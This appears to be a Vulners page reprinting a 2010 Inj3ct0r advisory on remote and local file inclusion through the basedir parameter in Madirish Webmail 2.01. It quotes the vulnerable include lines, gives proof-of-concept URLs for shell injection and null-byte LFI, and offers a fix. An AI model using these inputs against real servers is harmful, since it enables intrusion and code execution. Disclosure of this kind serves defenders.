Vulners
Lucene search
Madirish Webmail 2.01 Remote / Local File Inclusion
`=====================================================
Madirish Webmail 2.01 (basedir) RFI/LFI Vulnerability
=====================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################## 1
0 I'm eidelweiss member from Inj3ct0r Team 1
1 ######################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
Download: http://sourceforge.net/projects/madirishwebmail/files/madirish_webmail/2.01/Madirish_Webmail.tgz/download
Author: eidelweiss
Contact: eidelweiss[at]cyberservices.com
Thank`s: r0073r & 0x1D (inj3ct0r) , JosS , exploit-db team , [D]eal [C]yber
sp3x (securityreason) And All Friends.
Successful exploitation requires that "register_globals" is enabled.
========================================================================
Description:
Madirish Webmail is a PHP based email agent (with an Address Book and Calendar) primarily used to access a POP3 account via the web.
The system uses MySQL and PHP, and while developed for Linux, will probably work on other platforms.
========================================================================
-=[ VULN C0de ]=-
There is a vulnerability in almost every file directory , for example in this Directory file:
[-] Madirish_Webmail/lib/addressbook.php
*/
require_once($basedir."lib/sql.php");
require_once($basedir."lib/html.php");
*************************************************
[!]This other sample vuln c0de which affected to LFI [!]
*************************************************
[-] Madirish_Webmail/index.php
*/
require_once ("inc/config.php"); //<= 1
require_once ($basedir."lib/html.php");
require_once ($basedir."lib/common.php"); //<=2
========================================================================
-=[ P0C RFI ]=-
http://127.0.0.1/Madirish_Webmail/lib/addressbook.php?basedir= [sh3ll inj3ct0r]
-=[ P0C LFI ]=-
http://127.0.0.1/Madirish_Webmail/index.php?basedir= [LFI]%00
etc, etc, etc
========================================================================
NB:
There is a vulnerability in almost every file directory of Madirish Webmail v2.01.
Vendor fix the vulnerability in version 2.0 and update to v2.0.1
But vendor not perfectly fix the vulnerability , they just edit the code to handle Remote file inclusions,
but as we see still have RFI vulnerability and now i see possible LFI there.
Solution: Fix / Edit the code or update to new version if available, Example:
*/
require_once($basedir."lib/sql.php"); // change into require_once("Madirish_Webmail/lib/sql.php");
require_once($basedir."lib/html.php"); // change into require_once("Madirish_Webmail/lib/html.php");
=========================| -=[ E0F ]=- |=================================
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Apr 2010 00:00Current